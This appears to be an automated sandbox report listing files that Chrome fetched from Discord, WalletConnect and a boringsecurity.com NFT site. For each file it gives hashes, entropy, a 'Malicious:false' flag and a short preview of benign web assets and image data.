                                                                          Preview:{"listings":{"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96":{"id":"c57ca95b47569778a828d19178114f4db188b89b763c899ba0be274e97267d96","name":"MetaMask","homepage":"https://metamask.io/","image_id":"5195e9db-94d8-4579-6f11-ef553be95100","order":10,"app":{"browser":null,"ios":"https://apps.apple.com/us/app/metamask/id1438144202","android":"https://play.google.com/store/apps/details?id=io.metamask","mac":null,"windows":null,"linux":null,"chrome":"https://chrome.google.com/webstore/detail/metamask/nkbihfbeogaeaoehlefnkodbefgpgknn","firefox":"https://addons.mozilla.org/en-US/firefox/addon/ether-metamask/","safari":null,"edge":"https://microsoftedge.microsoft.com/addons/detail/metamask/ejbalbakoplchlghecdalmeeeajnimhm?hl=en-US","opera":"https://addons.opera.com/en-gb/extensions/details/metamask-10/"},"injected":[{"injected_id":"isMetaMask","namespace":"eip155"}],"rdns":"io.metamask","mobile":{"native":"metamask://","universal":"https://metamask.app.link"},"desktop":{"nativ
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):2058
                                                                          Entropy (8bit):4.614306214221163
                                                                          Encrypted:false
                                                                          SSDEEP:48:CVHe7HtOty0VulV1/8CXP0Cjek7aj4clug9ai:iANEyxx8UPTXaj4cogIi
                                                                          MD5:E1349377226366F95F85AB9EAC4586D3
                                                                          SHA1:9A3A00B6E6AB0A240363F4E4DB2F5288227FF76B
                                                                          SHA-256:2CA673A9914A35A230469A8A0FD6B4DB293B236DEA391633B53339AFE577A92E
                                                                          SHA-512:7C16967D1960CDE4914F71B6FE347A7764AAED42366A87920597D225F3874B5B34A00C5089564BEBF0A919C419049DB99B27128CC81BC28A1492460FD199F9E7
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 45 45" xml:space="preserve">. <defs>. <clipPath id="a" clipPathUnits="userSpaceOnUse">. <path d="M0 36h36V0H0v36Z"/>. </clipPath>. <mask id="b">. <g>. <rect x="0" y="0" width="100" height="100" fill="white" />. <path d="M11.708 29.849a1.296 1.296 0 1 0-2.591-.001 1.296 1.296 0 0 0 2.591 0" fill="black"/>. </g>. </mask>. </defs>. <g>. <g>. <g clip-path="url(#a)" transform="matrix(1.25 0 0 -1.25 0 45)" mask="url(#b)">. <g>. <path d="M12.75 18.25c1.226-2.195 1.855 1.361 9.313 2.625 7.457 1.264 13.728-4.454 13.859-5.413C36.053 14.504 31.474 6 26.459 6h-15.71C6.607 6 3.727 13.224 6.75 17.438c0 0 4.5 3.5 6 .812" fill="white"/>. </g>. <g>. <path d="M13.008 17.864C8.02 10.927 6.968 6 10.75 6c-4.142 0-6.577 6.187-4.468 11.031.463 1.064 1.758 2.492 1.758 2.492l4.18.008c.162-.32.598-1.366.79-1.667" fill="white"/>. </g>. <g>. <path d
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 640x213, components 3
                                                                          Category:dropped
                                                                          Size (bytes):16661
                                                                          Entropy (8bit):7.858826361098763
                                                                          Encrypted:false
                                                                          SSDEEP:192:hYNMtKwO3lLO3WLdjHQ8YCOL5XZtS3JKwX0T3TVL81qMf8usSeTm0qs/gbd2zbJK:hYNg7wOIWCUvS5js5L81qRuJ0//bDvaV
                                                                          MD5:E44C437F9459ADCE35CFC137798F4C75
                                                                          SHA1:33E53DF01FF6383C89217DADA973B7CA94406834
                                                                          SHA-256:03586B7BDBDAA14D1A09FDE868F6B3996C1666A2742E851BC922636A8102E248
                                                                          SHA-512:83A26DA09522F755AC3792FFE4E188361D2628602A7986D78A310CEB2267D7D894BF155D010C5F9A27083CCA061A3C46FCF91B5D13E92C5ABCB2631090161D86
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:......JFIF.....H.H.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (14250)
                                                                          Category:downloaded
                                                                          Size (bytes):14305
                                                                          Entropy (8bit):5.395434212185214
                                                                          Encrypted:false
                                                                          SSDEEP:192:vN0zP6AsfH9pCQtuQ16W6/Xnt2sNHAhWWg7vl08STJj4sGAvFR:l0zUOQEbvtGg77STJbGA7
                                                                          MD5:F7AC792A468442514D2C6E6B4119BCC4
                                                                          SHA1:A60449060A5E9DB68751BC7D45D6669780A442C3
                                                                          SHA-256:9281CE064DC41F0D9DCC73223AACFAA7648DEDADA91B2DBE114CD10D7731A17B
                                                                          SHA-512:E9FDFCA3825E10DAF7270169706FBFA26551ED3814273F688FE5D3DE8F568AE1FB2FA98EB8A2D75076D911A800BF4947A2D3AC232AE7023E7410D5C269693196
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/14875.ab7170b144439cba21c6.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["14875"],{812204:function(_,E,e){"use strict";e.r(E),e.d(E,{default:function(){return T}}),(i=I||(I={})).POPOUT_WINDOW="popout window",i.OVERLAY="overlay",i.NOTICE="notice",i.PREMIUM_UPSELL_TOOLTIP="premium upsell tooltip",i.BADGE="badge",i.USER_SETTINGS="user settings",i.USER_SETTINGS_MENU="user settings menu",i.ACCOUNT="account",i.TEXT_AND_IMAGES="text and images",i.GUILD_SETTINGS="guild settings",i.OVERVIEW="overview",i.STICKERS="stickers",i.VANITY_URL="vanity url",i.PREMIUM_MARKETING="premium marketing",i.PREMIUM_MARKETING_PLAN_COMPARISON="premium marketing plan comparison",i.PREMIUM_PAYMENT_MODAL="premium payment modal",i.PREMIUM_UPSELL_ALERT="premium upsell alert",i.PREMIUM_UPSELL_MODAL="premium upsell modal",i.PREMIUM_SETTINGS="premium settings",i.PAYMENT_FLOW_TEST_PAGE="payment flow test page",i.PREMIUM_PAYMENT_ACTION_SHEET="premium payment action sheet",i.CHANNEL_CALL="channel call",i.CHANNEL_CALL_CONNECTIN
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:JPEG image data, baseline, precision 8, 156x156, components 3
                                                                          Category:downloaded
                                                                          Size (bytes):6065
                                                                          Entropy (8bit):7.906110274967841
                                                                          Encrypted:false
                                                                          SSDEEP:96:PlaFNHmZB+daw53OmyZtOvaisZlQObAIJ5dx6aoeNTOYwPHtO2puuVxt3+F3ZEeX:PoaE5+b2aisZNbAIJ/I7eNTdKHtV0uVm
                                                                          MD5:A07ED4AE4FC5BD786EE939B358E21936
                                                                          SHA1:E4C3B55C50DA3080E951CE07E6DF85CCF9639947
                                                                          SHA-256:4B1C6B0198B2E91DD3EDC3D5AEF6C4D976328E0024AF96490F908945BC79CBD6
                                                                          SHA-512:563B6598922A76E0A51ED744680CFD57B9517AA134A5C0C77ECD6B1813890D56E86601A145F95711D3DDEE4E6200E7AE5B795B31AE47AB77FCE95D19D421C6D0
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_Lazy_Lions_118_4a741f9816.jpeg
                                                                          Preview:.....C.....................................%...#... , #&')*)..-0-(0%()(...C...........(...((((((((((((((((((((((((((((((((((((((((((((((((((...........".........................................A..........................!1A.."Qa.2q..#BRr...b...$3C...s.4S...................................-........................!1."2...AQ.Rq.a................?...+L..)@.R...7.1.p.K*X....|q_...*(iE...Zy.......e..gn......Z...3V..n...2..i.4..+."..=.X.$..Xx...!~`u.#....Yj?F.x.....V|..7>....r..]..-.J.:8..!.W!T.....Ed~.eg..S.!l./iyQ.N...nY..[ FRx..9.r.........t8......r..~..#Eq....%.51..K8C.9B... .B....{....ai.....%...z...O......~*..w.(^?.84..X..{..c.qJR.)..(.JR...(.JW...W......(.,....9....M{%..R.+.+.R.~.....[.. .....O..k.#0.\.]KyI?.:..M8.z:T.&.-,.p.0.+........g....:.U.I^.......|x.M....HB. ..IeDg.].Q...(....0VG.y......{....M..?*.,....i=/q.".g"+6.V.E._O. .HH.......S.x.\.r...1P......3.x..Y......dB........*..#.......vx.<iEmn....A<..?...-".'.I...j;..<Y.b.uD..Cq6.K..rydn...Z.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (13214)
                                                                          Category:downloaded
                                                                          Size (bytes):13269
                                                                          Entropy (8bit):5.539051321942966
                                                                          Encrypted:false
                                                                          SSDEEP:384:Lm31CXcJGbQR4igTh6vwPCpPGqK1KD9/tMKF3xg8:LG+Th6Y2Thg8
                                                                          MD5:9068A29C65CE047909211C7F5AD899D8
                                                                          SHA1:26BE7DA68FEBE3C6E9FF496313D73349FBD35784
                                                                          SHA-256:BDB5FE23CB92754B758B6D3E4B82682D2A34206739C079BF59F4358CEB88380C
                                                                          SHA-512:FC43BFD5EBEAB83CCE03CCEA620B99999B73976771EF3181AC62E53947946692B674A8F52501DC8B1B9373C5D8C370B6B79DC168640CA0407C434777741C9005
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/23992.3dc89a4c11d1402ff9e7.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["23992"],{803452:function(e,t,s){"use strict";e.exports=s.p+"b77d7b48860bbefdeeb2.svg"},378913:function(e,t,s){"use strict";e.exports=s.p+"906a38cbd45d6780304c.svg"},356002:function(e,t,s){"use strict";e.exports=s.p+"682f1b679b5bdb117165.webm"},197492:function(e,t,s){"use strict";e.exports=s.p+"87590a81cf78665e23ea.webm"},242777:function(e,t,s){"use strict";e.exports=s.p+"27316f256e0a1fb24421.mov"},838623:function(e,t,s){"use strict";e.exports=s.p+"9492f371ccf5db4f0156.mp4"},844389:function(e,t,s){"use strict";e.exports=s.p+"35b6e69b80885d349202.png"},392518:function(e,t,s){"use strict";e.exports=s.p+"b85e9e5e26daee13304b.webm"},336406:function(e,t,s){"use strict";e.exports=s.p+"0375f4834ae07b9d5de9.mov"},414298:function(e,t,s){"use strict";e.exports=s.p+"b9b0ab98fd3fcb65f4d5.mp4"},815143:function(e,t,s){"use strict";e.exports=s.p+"b7fb33c633b7ad9732e5.png"},134072:function(e,t,s){"use strict";e.exports=s.p+"988b159
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):686177
                                                                          Entropy (8bit):5.166600313281011
                                                                          Encrypted:false
                                                                          SSDEEP:12288:p7DZWaVNaMFyUQBQLo7MaQ1EUdVckawafavQEaYmLtqOafqPYqJj7X9sao9z29:psaDaMFiBQLVa6awafavQEaYmL8Oafqj
                                                                          MD5:C9533EF0C917FC64675ABC1C1918F368
                                                                          SHA1:F5F15B50997724E1635348D68F64A21F30C5FC76
                                                                          SHA-256:3F81672F01AD40E7FD2A7107DA429643F657E1A9968E6464DB98DC703E4D99E5
                                                                          SHA-512:507F75FE3BEF2A8381A87AF6658AA9CF423A5CCDD03DAD549A5AC81AB85EB7F5A3668DF5EB072A648C20AAEB0CA44564E7D8BC739D66D6CF5B4BFFC09DA00771
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/app.8f4aee4adf549cf3ee04.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["app"],{636478:function(e,t,o){"use strict";e.exports={addFriendHint:"addFriendHint__6df3d inputText__81d8a",addFriendInput:"addFriendInput__568d8 inputText__81d8a",addFriendInputWrapper:"addFriendInputWrapper__4bf8e",error:"error__7ab41",input:"input_d5574d inputText__81d8a",inputText:"inputText__81d8a",ring:"ring__39e88",success:"success__5b910"}},783686:function(e,t,o){"use strict";e.exports={activityPanel:"activityPanel__22355",base:"base__3e6af",container:"container__037ed",content:"content__4bf10",downloadProgressCircle:"downloadProgressCircle__7b735",fullWidth:"fullWidth__5c5c4",guilds:"guilds__2b93a",hasNotice:"hasNotice__1d477",hidden:"hidden__3ab58",loader:"loader__76b66",panels:"panels__58331",sidebar:"sidebar_ded4b5"}},748952:function(e,t,o){"use strict";e.exports={bancontactLogo:"bancontactLogo__0b133",epsLogo:"epsLogo__95976",gcashLogo:"gcashLogo__79636",giropayLogo:"giropayLogo__9aae5",goPayLogo:"goPa
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 400x400, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                          Category:downloaded
                                                                          Size (bytes):1962
                                                                          Entropy (8bit):7.877830420854902
                                                                          Encrypted:false
                                                                          SSDEEP:48:LcfUL6ppoQrXErVbZtsnlE6OawsMG5EuMOr1mD4QLa:LcfULB6UrHCnlelsmH+
                                                                          MD5:FC47577F72C6AC1B3644FD3C93C35434
                                                                          SHA1:7FA10148EB871D0CA72A79A89AE480A44AF8014B
                                                                          SHA-256:A96683AF833D7E9409BEA1D240842F89A6117C323FF048B484A23FEA13CCB61E
                                                                          SHA-512:07759BD845B5B7B820312F55DE4B09F4ECF25D1613811DC85388C6C18DFF36B6DA58B66565772CDE0121D6B859C0078FE6CD445A9B1D0F5B0DFEBED61B1798C9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://explorer-api.walletconnect.com/w3m/v1/getAssetImage/692ed6ba-e569-459a-556a-776476829e00?projectId=4de540f0804c83871ac4d89ebb9031e9&sdkType=w3m&sdkVersion=js-2.7.1
                                                                          Preview:RIFF....WEBPVP8 .....N...*....>I$.E..!.]..(....p...q..|.......7.3;.D.`...|..:.g./.T.CL.e....i...AS..3..*s..|'4.B..Nt4.^....=.........AS..3...x3.IB..p...9..=......J...*.bw.AS..3.......<...i.Yg./.T.C=.0doa...v.YS].z..*p.c->I..G?..x...2..Ns.n....}.Rur..s&.v..maF"-b..+.U.K....z.i..XP4......NN..Ga.(F.m1.+.U..=c.{...*..C=.{....A...*sb....x.;.w". .....t..../.T.......5..Y.3E.%....P.............RXm.Nf}.g./.$I.0....Z.=......Wx...zN.......T.'..H.Bf.u9..>..;v.7....9..../.(c.>...).9..>.|mI....Gp...ixC...7U.L.e....AW.`............|2..Q(H..O.O.. f.F....i...AB..l..._&.3ON.|..:.g./....F..g./.T.CL.e....i...AS..3..*s..|2..Nt4.........A&.....Q..d.O....v%.f..PD....4B.a.w.y.w.. .C...P......YCjq...8..{<p6.c... .u.#. ..HW...FxL...*f..9.s.2.O.c_FXCd.....z..N..=c..<.4.ie.E..4........LZ..+=F......E.."...:!4..4h...qq.w(q@..2"...BR eg....;...2...........e.H...P..3z...!....`..?2.'....P......._>.........../.HS.....u...+..6...j_.6...^..y.....Y=. .6..7.m2U..'.f!....o.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (10010)
                                                                          Category:downloaded
                                                                          Size (bytes):10065
                                                                          Entropy (8bit):5.545516885326053
                                                                          Encrypted:false
                                                                          SSDEEP:96:4FE1BuKcIOPyeRa8JqRJQsEkhrceXZBiYQBB+7eOWfxMu/vpKtvXtfLNiK9vLdVd:eiuTIOPyH4fx5Vvp5e4XV1M+acyB
                                                                          MD5:A4FF99B0BBADC5F521C2A07F0F1E3F93
                                                                          SHA1:30B17F14702FE71F825A3966B652F65705EC3C93
                                                                          SHA-256:6E2B1B73E8B8DBF90920572224E0EDFBF56FA6E20D0CEDE00321CB2AC91C1254
                                                                          SHA-512:FC24DE0802380CE052E1BB6FE82B0C1DB41FCDB14D0BB929FC4726D2A645B6883044DA173157B9EB0D9B873E17410640887C1B030AFCD6F301A8A9F33DB66246
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/47498.38da6b2cf2f487359536.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["47498"],{685829:function(n,e,t){"use strict";t.r(e),t.d(e,{loadOnboardingPrompts:function(){return f},fetchOnboardingPrompts:function(){return N},maybeFetchOnboardingPrompts:function(){return g},startOnboarding:function(){return E}}),t("702976");var i=t("872717"),r=t("913144"),o=t("716241"),l=t("271938"),u=t("26989"),d=t("305961"),s=t("599110"),a=t("568734"),p=t("863636"),O=t("653138"),_=t("49111"),c=t("657944");function f(n){s.default.track(_.AnalyticEvents.GUILD_ONBOARDING_LOADED,{...(0,o.collectGuildAnalyticsMetadata)(n),has_new_prompts:!1,number_of_prompts:0})}function N(n){return r.default.dispatch({type:"GUILD_ONBOARDING_PROMPTS_FETCH_START",guildId:n}),i.default.get({url:_.Endpoints.GUILD_ONBOARDING(n)}).then(e=>{let{body:t}=e,i=(0,O.serverApiResponseToClientState)(t);return r.default.dispatch({type:"GUILD_ONBOARDING_PROMPTS_FETCH_SUCCESS",guildId:n,...i}).then(()=>i.prompts)},e=>(r.default.dispatch({type:"G
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):110574
                                                                          Entropy (8bit):5.4026565198582714
                                                                          Encrypted:false
                                                                          SSDEEP:1536:hCBD100CPsqwqlumyOSsNQqfjWv4UTlxBQhCg5N241cjxpgAkF+d1a1u:QB+0NpYRWv4mqpmjxpca1aw
                                                                          MD5:052C17E11E732DE852F587CB1FE2CDA5
                                                                          SHA1:31A92C74CE4C31C741D43570106A7086C94362FA
                                                                          SHA-256:52BF56DDFB5538D260A9163C9FA4BD213FB2B79EE3DA2A2CDA4DE6C37ED53FF6
                                                                          SHA-512:09C88E933C0965246A672F8F200D53D4D1A69F034A2EBDDE48355E8636FE5783BF94788887BD9771E83793BCADC2486764CD1B720FE74B9C61377488D96D60F2
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/98106.5d0f74b94113ede84656.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["98106"],{875603:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var o=function(e){for(var t,n=e.length,o=n^n,r=0;n>=4;)t=(65535&(t=255&e.charCodeAt(r)|(255&e.charCodeAt(++r))<<8|(255&e.charCodeAt(++r))<<16|(255&e.charCodeAt(++r))<<24))*1540483477+(((t>>>16)*1540483477&65535)<<16),t^=t>>>24,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)^(t=(65535&t)*1540483477+(((t>>>16)*1540483477&65535)<<16)),n-=4,++r;switch(n){case 3:o^=(255&e.charCodeAt(r+2))<<16;case 2:o^=(255&e.charCodeAt(r+1))<<8;case 1:o^=255&e.charCodeAt(r),o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16)}return o^=o>>>13,o=(65535&o)*1540483477+(((o>>>16)*1540483477&65535)<<16),((o^=o>>>15)>>>0).toString(36)}},363954:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return o}});var o=function(e){var t={};return function(n){return void 0===t[n]&&(t[n]=e(n)),t[n]}}},368532:function(e,t,n){"use strict";n.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:SVG Scalable Vector Graphics image
                                                                          Category:dropped
                                                                          Size (bytes):139
                                                                          Entropy (8bit):4.710597482771287
                                                                          Encrypted:false
                                                                          SSDEEP:3:t6WH7W+lFAATcvdnmFFSDDmJS4RKb5KGMXf/FGc8qQAGrqLW:t6Abli/m03mc4sldMX9QAw
                                                                          MD5:72A8B168AD2C7EEA7B2559B5690C7695
                                                                          SHA1:85E4F43154EA713C832BA27128A33EB7B2A7CF7A
                                                                          SHA-256:1F988D1AD4AB163D61A584254C07D75F3241EB6380BF48BF7D8F981E13C092CD
                                                                          SHA-512:11BCB1A3623B97C9DD2F22D0389B3CA05AB4F99596DE5D07C50C1FC83F7532D8C20B58379C54C38F503D86D8C2CAF52AF3B35FFCCDC4750089ABAF86C1C5294E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<svg fill="none" height="8" viewBox="0 0 8 8" width="8" xmlns="http://www.w3.org/2000/svg"><circle cx="4" cy="4" r="4" fill="#fff"/></svg>.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (31861)
                                                                          Category:downloaded
                                                                          Size (bytes):31916
                                                                          Entropy (8bit):5.413068589099412
                                                                          Encrypted:false
                                                                          SSDEEP:768:aAuykbCRgjoyslheA9Kmg0aqmqupAuhiTbZ0cvepKN51FyObn2E1PidHS7oxSKls:eeK/0axAuhiTbZ0cvepKNbBwSMvrr5JQ
                                                                          MD5:5C6CA942E3C7948D8779FF434FCEACAA
                                                                          SHA1:51AFFE7CBD570CD8DA39413C7F5A88E023F8313B
                                                                          SHA-256:9E90982D7A17A1C8A561485335C8EEE86E82A982829A2ACB8CB83A1CA8C23CFE
                                                                          SHA-512:8FB687F636C33534ECA0DDEAAC402B5B79401CD54857F57C15020CF70FC5AD14D2EE8802E3F6D834F45240CBC860F4F0CB7A9B9A262F63446F0DC74D385665C5
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/43820.2dfe02f35ae2675fa737.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["43820"],{354087:function(e,t,i){"use strict";i.r(t),i.d(t,{DoorExitIcon:function(){return u}});var n=i("37983");i("884691");var r=i("669491"),a=i("75196");let u=e=>{let{width:t=24,height:i=24,color:u=r.default.colors.INTERACTIVE_NORMAL,colorClass:s="",...l}=e;return(0,n.jsxs)("svg",{...(0,a.default)(l),xmlns:"http://www.w3.org/2000/svg",width:t,height:i,fill:"none",viewBox:"0 0 24 24",children:[(0,n.jsx)("path",{fill:"string"==typeof u?u:u.css,d:"M9 12a1 1 0 0 1 1 1v2a1 1 0 1 1-2 0v-2a1 1 0 0 1 1-1Z",className:s}),(0,n.jsx)("path",{fill:"string"==typeof u?u:u.css,fillRule:"evenodd",d:"M2.75 3.02A3 3 0 0 1 5 2h10a3 3 0 0 1 3 3v7.64c0 .44-.55.7-.95.55a3 3 0 0 0-3.17 4.93l.02.03a.5.5 0 0 1-.35.85h-.05a.5.5 0 0 0-.5.5 2.5 2.5 0 0 1-3.68 2.2l-5.8-3.09A3 3 0 0 1 2 16V5a3 3 0 0 1 .76-1.98Zm1.3 1.95A.04.04 0 0 0 4 5v11c0 .36.2.68.49.86l5.77 3.08a.5.5 0 0 0 .74-.44V8.02a.5.5 0 0 0-.32-.46l-6.63-2.6Z",clipRule:"evenodd",clas
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (829), with no line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):829
                                                                          Entropy (8bit):5.317869237680555
                                                                          Encrypted:false
                                                                          SSDEEP:12:ZaqVBGmFM1PXItFfBJCYRiV+VR61l6Vl89vjl6ehgggREhFXjV:ZNUcM1PIBJ8V+OXvTggHhFV
                                                                          MD5:7AB69E926DB88B0D0D5B0067B451875C
                                                                          SHA1:E8CF02A924910849EB744A71C7393E15BDD8D203
                                                                          SHA-256:2656E6ADAFBBD0879DCF2BFB6346A1293F7AA01E1BFE0A477C59C19D527C0547
                                                                          SHA-512:7BE174096A410EC2EBFD2EEE2A2D55177A2EEF0738659D73CAB9C70BB9C3684703AC4C0B833CE80918EDE32B5034E0DD20157221D9ACE68C8D0E230279FB906D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boringsecurity.com/_next/static/gCkYQnlwM1KFyjXElH0ki/_buildManifest.js
                                                                          Preview:self.__BUILD_MANIFEST=function(s,c,a,e){return{__rewrites:{beforeFiles:[],afterFiles:[],fallback:[]},"/":[e,s,a,"static/chunks/98-5331d5e48bc919a7.js","static/chunks/59-d0e28623b64e6b96.js",c,"static/chunks/pages/index-91b2c5d3a0144c32.js"],"/_error":["static/chunks/pages/_error-86d94e3ab178e841.js"],"/articles/[slug]":[e,s,a,c,"static/chunks/pages/articles/[slug]-de3fa8a83029dc4e.js"],"/classes":[s,a,c,"static/chunks/pages/classes-2c2937c17e30e430.js"],"/nft-claim":[s,c,"static/chunks/pages/nft-claim-e901cbcaf7b3dbc6.js"],sortedPages:["/","/_app","/_error","/articles/[slug]","/classes","/nft-claim"]}}("static/chunks/514-a4b28d509d8a38e7.js","static/chunks/196-de1449618af62cf8.js","static/chunks/940-c7b68c0e005aa30a.js","static/chunks/d3a2d874-4eb3a08696765140.js"),self.__BUILD_MANIFEST_CB&&self.__BUILD_MANIFEST_CB();
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (14707)
                                                                          Category:downloaded
                                                                          Size (bytes):14756
                                                                          Entropy (8bit):5.500444713765522
                                                                          Encrypted:false
                                                                          SSDEEP:384:5chLA5lPvn/iVlLcwBXY7weBIr/nDv8W/fi9QZO2K:5OncwBY7TBwvN/fK2K
                                                                          MD5:1706F4F5FBEAEF14B6B376F91A5864E4
                                                                          SHA1:4A3885604BE5757E167140D884F6F08CFED36C86
                                                                          SHA-256:507AB9D9E303545B0E3878CFF37648842BDB685090B99901D3D71007A49860ED
                                                                          SHA-512:B2CB172F274821006F547D8C75526792A4F6B077F55DCFB5B4439A8860ACD6E9C9C00F8F8AC017132EC83895BA19E0B35D90DF049CA53BA1249CD56D17A49AD8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://discord.com/assets/6377de1b7ec4e85ff431.js
                                                                          Preview:(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["11960"],{406043:function(e,t,n){"use strict";n.r(t),n.d(t,{useCurrentUserCommunicationDisabled:function(){return o},default:function(){return d},userCommunicationDisabled:function(){return c}});var l=n("446674"),a=n("26989"),u=n("697218"),i=n("509");function o(e){let t=(0,l.useStateFromStores)([u.default],()=>u.default.getCurrentUser());return d(null==t?void 0:t.id,e)}function r(e,t,n){return null!=t&&null!=e?n.getMember(t,e):null}function s(e){var t;return[null!==(t=null==e?void 0:e.communicationDisabledUntil)&&void 0!==t?t:null,(0,i.isMemberCommunicationDisabled)(e)]}function d(e,t){let n=(0,l.useStateFromStores)([a.default],()=>r(e,t,a.default),[t,e]);return s(n)}function c(e,t){let n=r(e,t,a.default);return s(n)}},192112:function(e,t,n){"use strict";var l,a,u,i;n.r(t),n.d(t,{ActionComponentState:function(){return l},SelectOptionType:function(){return a}}),(u=l||(l={}))[u.NORMAL=0]="NORMAL",u[u.LOADING=1]="LOADI
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:PNG image data, 156 x 156, 8-bit/color RGBA, non-interlaced
                                                                          Category:downloaded
                                                                          Size (bytes):23337
                                                                          Entropy (8bit):7.986710200625998
                                                                          Encrypted:false
                                                                          SSDEEP:384:rw1zay3MCSBQcVwE12zPrteOMIdOUdJQLHWLe13SC/VjkDGsPUzc1hvH0H6DgpC:YTBS3CEIddOUdJ8HWLeFXkDGCicoH6DD
                                                                          MD5:5E4D41C20FAEA6FAE4B52EE2CE3AF30B
                                                                          SHA1:63FC5913406E60922948E1885711E9D1C4D3593B
                                                                          SHA-256:73BA0CCCA8C554E3DA6D86C6EF1DD41B4DB07F7172E2B34F114549650D42EFAA
                                                                          SHA-512:6367C50D6985B3B9B50EE72526A47B9B584247B1C795CA1E6F7E1552D733D06138572485A2DF0DADFA03D115617F938CBFC9C7695D93C75AA96DA9C4BAF9E7DF
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://boring-security-cms.s3.amazonaws.com/thumbnail_Bored_Ape_Yacht_Club_Bored_Ape_Yacht_Club_4073_1cb1c9b884.png
                                                                          Preview:.PNG........IHDR................M....pHYs............... .IDATx..w\....=........P...=.....&...{....{.!(.T....Z....]..{.e....r]..uC0R{.>.s..P..~.!......}..\.....+..W....0a. X.../...}........5...k Py.........Q..I...n.....q...3.....xB...h.`...ql.].....Jf.9BbJ..p%&+qVf~..q~..O.l......P!..Q..../........?x.T.Q.xB9./8.}...'.........y.....,.[c.@.?..*,..'..c....q.1..B... lc..]...^......J@A...8. .....m.....5.2....?.E...1.;.nc.%..\..@.........7fJ..(._\....c.7...*...pJ.:.pc.....n..1....5..n.4..y............`L.F.M.>Bk...p......n....#....7A...1.F.M.>Bk...p......n....#....7A...1.F.M.>Bk...p......n....#....7A...1..w].......y.7T8..#......}.4]@........=...G........H...Q.m.,..K@.....P.....I....)......u.'............)\..p...(........+9(.SCS198..y"...B 'F.a.cg.&v........K...TH.I..A................a..#d.).n..d..L4M 1P..!i.....\a..=_jk.,.5..sL...V...N..|.....RiK..$.s.];..bC....f.....,..-...#e..._..[l.o....p.\.1........SIj..........P.....Rc..a.D.Y........j...X..>....m...xm.v..
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
